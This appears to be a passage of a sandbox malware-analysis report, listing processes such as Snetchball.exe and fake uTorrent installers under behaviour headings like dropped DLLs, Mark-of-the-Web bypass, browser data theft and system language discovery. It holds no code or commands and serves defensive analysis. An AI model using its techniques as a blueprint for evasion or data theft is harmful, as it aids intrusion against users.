N/A N/A C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\ProgramData\uTorrent\utorrent9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\SteamSetup.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Steam\steam.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\E:\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
